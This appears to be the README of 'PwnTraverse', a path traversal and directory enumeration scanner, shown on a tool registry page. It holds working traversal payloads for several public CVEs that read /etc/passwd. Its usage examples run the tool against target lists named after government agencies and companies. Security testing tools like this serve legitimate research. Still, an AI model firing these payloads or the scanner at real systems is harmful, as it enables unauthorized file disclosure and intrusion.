PwnTraverse
PwnTraverse, An advanced path traversal & endpoint vulnerability scanner for security researchers, bug bounty hunters, and penetration testers. Detects path traversal flaws, performs deep directory enumeration, and identifies CVE-related issues automatically.
Install / Use
/learn @odaysec/PwnTraverseREADME
PwnTraverse is an advanced Path Traversal & Endpoint Vulnerability Scanner designed for security researchers, bug bounty hunters, and penetration testers. This tool automates the discovery of Path Traversal vulnerabilities and related CVEs, helping security professionals quickly assess and report security issues.
Key Features
-
Automated Path Traversal Detection
Scans and detects path traversal vulnerabilities using a variety of payloads (../, double-encoding, bypass tricks). -
Deep Directory Enumeration
Performs intelligent directory brute-forcing to uncover hidden files and endpoints. -
CVE & Endpoint Mapping
Correlates discovered endpoints with known CVEs and potential LFI/RCE attack surfaces. -
Clean & Actionable Reports
Generates structured vulnerability reports for easy documentation and bug bounty submission.
Installation
- Clone the Repository
git clone https://github.com/odaysec/PwnTraverse.git
cd PwnTraverse
- Install Dependencies Ensure you have Python 3.x installed, then run:
pip install -r requirements.txt
- (Optional) Create a Virtual Environment
python3 -m venv pwntraverse-venv
source pwntraverse-venv/bin/activate # Linux / MacOS
.\pwntraverse-venv\Scripts\activate # Windows
Usage
Run the scanner with:
python3 exploit.py --url https://target.com --wordlist wordlists/common.txt
python exploit.py --file gov.txt --thread 15
python exploit.py --file tesla.txt --ssl
python exploit.py --range 192.168.15.1,192.168.15.100 --thread 30
python exploit.py --file fbi.txt --thread 15 --timeout 3
python exploit.py --file gov.txt --debug
Available options:
--url→ Target URL--wordlist→ Custom wordlist for directory enumeration--threads→ Number of threads (default: 10)--output→ Save results to file (JSON/HTML)
Output
[+] Testing target: https://target.com
[+] Found potential path traversal: https://target.com/download?file=../../../../etc/passwd
[+] CVE-2022-12345 matched for endpoint: /download
[+] Report saved to: reports/scan-2025-09-21.html
Roadmap
- [ ] Add more traversal payloads (double URL encoding, UTF-16 bypass)
- [ ] Add Burp Suite plugin integration
- [ ] Generate PDF reports
Exploit Payloads
File:
assets/exploits.json
{
"CVE-2021-41773": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
"CVE-2021-42013-0": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd",
"CVE-2020-17519-0": "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
}
References Payloads: PayloadAllTheThings
⚠️ Disclaimer
This project is for educational and security research purposes only.
Do not use it against systems without prior authorization.
The author(s) are not responsible for any damage caused by misuse of this tool,
including but not limited to data loss, system compromise, or legal consequences.
By using this tool, you agree to take full responsibility for your actions.
<p align="center">
<a href="https://star-history.com/#odaysec/PwnTraverse&Date">
<picture>
<source media="(prefers-color-scheme: dark)" srcset="https://api.star-history.com/svg?repos=odaysec/PwnTraverse&type=Date&theme=dark" />
<source media="(prefers-color-scheme: light)" srcset="https://api.star-history.com/svg?repos=odaysec/PwnTraverse&type=Date" />
<img alt="Star History Chart" src="https://api.star-history.com/svg?repos=odaysec/confluPwn&type=Date" />
</picture>
</a>Related Skills
YC-Killer
2.7kA library of enterprise-grade AI agents designed to democratize artificial intelligence and provide free, open-source alternatives to overvalued Y Combinator startups. If you are excited about democratizing AI access & AI agents, please star ⭐️ this repository and use the link in the readme to join our open source AI research team.
best-practices-researcher
The most comprehensive Claude Code skills registry | Web Search: https://skills-registry-web.vercel.app
groundhog
399Groundhog's primary purpose is to teach people how Cursor and all these other coding agents work under the hood. If you understand how these coding assistants work from first principles, then you can drive these tools harder (or perhaps make your own!).
last30days-skill
10.3kAI agent skill that researches any topic across Reddit, X, YouTube, HN, Polymarket, and the web - then synthesizes a grounded summary
